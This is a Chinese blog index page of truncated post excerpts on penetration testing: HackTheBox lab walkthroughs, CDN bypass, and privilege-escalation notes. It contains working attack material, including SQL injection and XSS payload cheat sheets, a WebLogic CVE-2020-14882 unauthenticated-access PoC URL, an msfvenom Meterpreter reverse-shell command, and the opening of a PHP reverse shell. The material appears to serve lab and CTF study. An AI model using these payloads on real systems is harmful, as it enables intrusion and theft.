- 博客(30)
- 资源 (2)
- 收藏
- 关注
原创 CDN学习篇
CDN学习篇CDN技术即为内容分发网络,是为了缓解网速的问题而出现的,一般是大公司才有的技术设计之初并非为了信息安全的目的,但是却无意中给安全渗透造成了一定的阻碍有分为不同通信厂商的CDN,也有分为不同地区的CDNCDN判断判断是否存在CDN可以利用站长之家的超级ping来查询,如果不同地区ping的ip地址不同那么就存在CDN,否则不存在CDN绕过技术1.子域名查询绕过有些站长会给主站或者流量多的网站做CDN,但是不会给旁站做CDN,从而可以获取真实的ip地址2.邮件服务查询3.国外
2021-09-06 22:46:10
638
原创 漏洞学习平台
中间件漏洞利用查询https://vulhub.org/#/environments/web安全学习笔记https://www.gksec.com/knowledge-web/language/index.html#日后会持续更新本篇
2021-09-05 13:41:49
484
原创 hackthebox --pit
文章目录一、pandas是什么?二、getshell三、提权一、pandas是什么?nmap信息收集一下,发现存在域名解析协议,把圈起来的红色部分中的域名添加进/etc/hosts文件,然后去搜一下服务的漏洞,没有什么收获,访问一下各个端口,也没有什么收获,收集一下udp的协议的信息发现开放了161端口,使用snmp协议,通常管理员的安全意识不够强的话, 我们是可以从这个端口获取很多信息的,这个协议叫简单网络管理协议,使用github中下载下来的snmp扫描工具扫描一下,连接地址:https.
2021-08-26 23:30:40
303
原创 hackthebox --schooled
文章目录一、信息收集二、getshell三、提权总结一、信息收集在80端口发现可能存在解析协议,在/etc/hosts中添加域名果然可以使用这个域名,去访问了一下,没什么发现,于是模糊测试一下发现了一个moodle的域名,添加进hosts文件找到一个注册的网页,注册一个新的账号二、getshell成功进入系统,之后加入数学的课程,你会得到一些提示,就是老师会检查你的profile里面的某个设置,那么就尝试xss注入,获取老师的cookie值在里面插入如下的xss语句,.
2021-08-22 22:58:10
198
原创 php_reverse_shell
<?php// php-reverse-shell - A Reverse Shell implementation in PHP// Copyright (C) 2007 pentestmonkey@pentestmonkey.net//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool.
2021-08-22 12:56:34
566
原创 网络基本知识
OSI七层物理层 传输比特流 比特流应用层 为程序提供服务 数据表示层 压缩解压缩 数据传输层 端到端连接 段网络层 路由选择寻址 包数据链路层 介质访问控制 帧会话层 建立管理会话 数据IP 地址分类A类 1.0.0.0 — 126.255.255.255B类 128.0.0.0 — 191.255.255.255C 192.0.0.0 — 223.255.255.255TCP三次握手 四次
2021-08-18 11:20:10
78
原创 hackthebox --Previse
文章目录前言一、信息收集二、getshell三、提权总结前言前言就是,没有前言,啊哈哈哈,嘎嘎嘎嘎嘎嘎一、信息收集nmap扫描发现开放了22跟80端口,搜索了一下,没有找到可以利用的服务漏洞,也可能使我太菜了,接下来扫一下目录发现一个accounts.php的重定向页面,尝试使用一些技巧访问因为这个页面因为这个页面可能跟账号有关,说不定可以得到一些账号密码,account的中文意思就是账号然后修改返回的状态码为200 Ok二、getshell可以得到如下的页面:注册一个
2021-08-17 18:10:31
349
原创 利用AlwaysInstalledElevated的漏洞提权
提权我们可以利用AlwaysInstalledElevated的提权漏洞,那么创建一个msi文件,命令如下:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.15.156 lport=5555 -f msi > shell.msi在123.exe的shell中执行 execute -H -f shell.msi再次开启一个新的端口监听:use exploit/multi/handlerset payload php/me
2021-08-14 09:59:25
135
原创 利用域名解析协议+特殊文件查看+php反向shell来getshell
发现443端口上提示有个staging.love.htb域名,很好,那么我们可以去修改/etc/hosts的文件,指定这个域名的解析ip为10.10.10.239,然后就可以去访问这个域名了,kali中的修改命令如下:vim /etc/hosts成功访问,结果如下:home看起来没有什么特别值得关注的,直接到demo发现可以通过 “url地址” 去访问文件,于是想起了那个被禁止的5000端口,于是尝试一下,看看能不能访问,命令 “ localhost:5000 ” ,访问结果如下:成功获取
2021-08-13 22:33:22
202
原创 利用php/ 8.1.0-dev的漏洞进行getshell
使用nikto试试看发现这个存在最新爆出的漏洞,尝试看看有没有修复可以远程代码执行,于是反弹shell使用连接,成功获取james权限
2021-08-13 22:29:50
245
原创 寻找流量包,并且通过流量包获取账号密码来getshell
在每次访问security snapshot时,url中data后面的数字都不相同尝试修改成0,结果如下:发现了很多的tcp,ip流量包,于是download流量包,用wireshark分析流量包成功获取ftp的用户名跟密码,然后登录ftp尝试用这个账号跟密码去登录ssh成功登录,并且获取到user.txt里面的内容...
2021-08-13 22:24:33
530
原创 使用端口转发+安卓adb进行提权
kali中的下载命令如下:apt-get install android-tools-adb接下来尝试从 ssh 端口转发,并在端口 5555 上使用连接ssh时的登录密码命令如下:ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222然后使用adb连接5555端口,命令如下:adb connect 127.0.0.1:5555最后使用shell:adb -s 127.0.0.1:5555 shell至此,提权完成参考图片如下:
2021-08-13 17:02:05
2240
1
原创 利用“ES File Explore”服务的漏洞(任意文件读取漏洞)获取账号密码
扫描发现只开放了2222跟5555端口,深入扫描一下发现还开放了34687,42135跟59777端口,然后去寻找各个端口服务的漏洞最后发现在42135端口存在“ ES File Explorer Name Response httpd”可利用漏洞,这个漏洞是任意文件读取漏洞,接下来就是通过这个漏洞去查找敏感文件,看看是否存在敏感信息,帮助我们getshell最终在网上找到了一个有关“ ES File Explorer Name Response httpd”的exploit# Exploit
2021-08-13 16:56:05
1087
原创 sudo nopasswd+代码审计+脚本编写提权
sudo一下,看看是否有什么可以提取权限的方法,并且查看一下可以提权的文件经过代码审计,发现可以构造一个脚本,提取权限在/home/development目录下有一个ticket.md,我们可以修改这个脚本如下:然后使用sudo运行这个脚本,即可返回root用户的连接成功获取root权限,并且获得root.txt的内容...
2021-08-13 16:48:49
166
原创 利用bp抓包,修改xml进行getshell
80端口访问到处点点点,然后发现了一个提交页面抓包分析一下data里面的数据是先base64加密,然后在url加密的,所以解密后的结果如下:尝试修改xml的实体,看看能不能访问/etc/passwd文件,修改后的结果如下:然后base64加密,再url加密,然后再重放包成功访问passwd,把返回的数据保存在一个文件,并且取名叫passwd,待会要用现在尝试访问db.php文件,修改脚本如下:重放包解密返回的数据得到一个账号密码尝试用得到的账号密码连接ssh连接失
2021-08-13 16:44:55
912
原创 hackthebox --BountyHunter
文章目录一、信息收集二、getshell三、提权总结一、信息收集先扫描一下,看看开启了哪些端口,哪些服务,以及哪些敏感目录经过一番搜素以及检查,发现并不存在服务漏洞,也没有什么敏感的目录于是扩大目录的扫描范围 :发现一个叫db.php的文件以及一个叫resources的文件夹,访问resources文件夹的结果如下:db.php访问没有任何信息于是老老实实地去80端口访问到处点点点,然后发现了一个提交页面抓包分析一下data里面的数据是先base64加密,然后在url加密
2021-08-13 12:46:19
503
原创 命令执行简介
命令执行的原理:应用有时需要调用一些执行系统命令的函数,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。利用条件:应用调用执行系统命令的函数将用户输入作为系统命令的参数拼接到了命令行中没有对用户输入进行过滤或过滤不严漏洞分类:代码层过滤不严商业应用的一些核心代码封装在二进制文件中,在web应用中通过system函数来调用:system("/bin/program --arg $arg");系统的漏洞造成命令注入bas
2021-08-11 10:01:10
377
原创 xss常用攻击语法
常用:<script>alert(1)</script> <img src=x onerror=alert(1)> <svg onload=alert(1)> <a href=javascript:alert(1)><script>alter('dreeee')</script>;用于探测的万能语句:<SCRscriptIPT>'"()Oonnjavascript标签溢出:"> <
2021-08-11 09:47:01
3040
原创 sql注入常见语句
报错注入:and updatexml(1,concat(0x7e,(database()),0x7e),1) --+and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1) --+and updatexml(1,concat(0x7e,(select group_concat(column_name
2021-08-11 09:42:22
196
原创 cve-2020-14882 Weblogic未授权命令执行复现
漏洞复现:1.构造PoC,可以直接未授权接管后台:http://ip:port/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%292.命令执行----->疯
2021-08-11 09:38:03
249
原创 hackthebox --explore
文章目录一、信息收集二、Getshell三、提权总结一、信息收集扫描发现只开放了2222跟5555端口,深入扫描一下发现还开放了34687,42135跟59777端口,然后去寻找各个端口服务的漏洞最后发现在42135端口存在“ ES File Explorer Name Response httpd”可利用漏洞,这个漏洞是任意文件读取漏洞,接下来就是通过这个漏洞去查找敏感文件,看看是否存在敏感信息,帮助我们getshell。二、Getshell代码如下(示例):最终在网上找到了一个有关
2021-08-10 16:55:36
606
4
原创 hackthebox --cap
文章目录前言一、信息收集二、获取shell三、提权总结前言前言?前个屁的言。一、信息收集nmap之后看到开放了三个端口,分别是21,22,80端口,于是再详细扫描一波根据服务的版本去网上查找,看看是否有exploit,结果没有任何收获(可能是我太菜了),于是使用nikto扫描一下没有什么有价值的东西,还是老老实实去80端口看看吧二、获取shell看到有个search,试了一下,看看能不能远程代码执行,发现行不通参考了大佬的文章后,发现在每次访问security snapsho
2021-08-09 23:41:47
309
原创 hackthebox --knife
文章目录一、信息收集二、获取普通用户权限三、提权总结一、信息收集首先,先使用nmap扫描一下目标主机开启了那些端口跟服务恩,看到只有两个常见的端口开放,访问一下80端口这个页面没有什么有价值的东西,于是继续深入扫描一波没有发现太多有价值的东西,使用dirb扫描试试看没有什么收获二、获取普通用户权限使用nikto试试看发现这个存在最新爆出的漏洞,尝试看看有没有修复可以远程代码执行,于是反弹shell使用连接,成功获取james权限三、提权使用knife进行提权
2021-08-07 23:32:44
135
原创 oscp流程
信息收集:谷歌黑客语法,whois,theharvester收集邮箱,netcraft扫描:nmap,nessus漏洞扫描,metasploit(其实就是msfconsole)枚举:ssh,http,smb,dns,ftp,smtp,snmp使用nc:正向连接,反向连接缓冲区溢出攻击获取root利用metasploit获取root常见攻击手段:文件上传,文件包含,sql注入,xss三部曲文件传输:linux系统通常使用wget,windows使用FTP或者TFTP权限升级:windows提权
2021-08-07 11:50:08
439
原创 hackthebox---love
文章目录前言一、nmap信息收集二、ssl证书域名解析三、进入后台,获取反向的shell四、windows_reverse_shell五、提权总结前言一、nmap信息收集首先,老规矩,先给它嘛来一梭子,nmap走起!看看开启了那些端口,那些服务好的,开启了很多的服务,开启的端口越多对我们越有利 (笑容逐渐放肆)再次进行详细的信息收集去各个端口访问一波,没太大的收获,其中80和5000端口如下:被禁止访问了!有点意思,肯定有货,才禁止我们访问二、ssl证书域名解析发现443端.
2021-08-06 22:54:23
282
1
原创 windows基础命令
cls 清屏dir 浏览当前文件夹内容dir e:\ 指定路径dir /a 指定所有内容包括隐藏内容切换分区,该分区盘符加:CD 加文件名来进入文件来CD … 退出到止一发眼CD \ 直接退出到根目录md <文件夹名> 创建文件夹rd <文件夹名> 删除文件夹《限空文件夹》rd test /s /q 无提示删除文件夹type <<文件名>> 只读浏览del <文件名> 删除文件del *<后
2021-08-03 22:55:12
76
原创 linux命令
Linux命令总结:1.有且仅有-个根目录 /2.Linux是以文件形式管理设备,Linux系统,一切皆文件3.Linux各个目录存放的内容是规划好的,不要去乱放文件4.第一层的各个文件目录存放的内容,要记住5.要有目录树的认识:selinux :控制程序只能访问一些特定文件sys :系统文件用户管理:su <用户名> 切换当前用户和权限(只在终端中)useradd <用户名> 创建一个新用户id <用户名> 查询某用户的信息userdel
2021-08-03 22:53:15
65
翻译 正则表达式
正则表达式一、校验数字的表达式数字:1$n位的数字:^\d{n}$至少n位的数字:^\d{n,}$m-n位的数字:^\d{m,n}$零和非零开头的数字:^(0|[1-9][0-9])$非零开头的最多带两位小数的数字:^([1-9][0-9])+(.[0-9]{1,2})?$带1-2位小数的正数或负数:^(-)?\d+(.\d{1,2})$正数、负数、和小数:^(-|+)?\d+(.\d+)?$有两位小数的正实数:2+(.[0-9]{2})?$有1~3位小数的正实数:3+(.[0-9]{
2021-08-03 22:43:47
1203
cn_win_srv_2003_r2_standard_with_sp2_vl_cd1_X13-46532.iso
2021-08-03
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人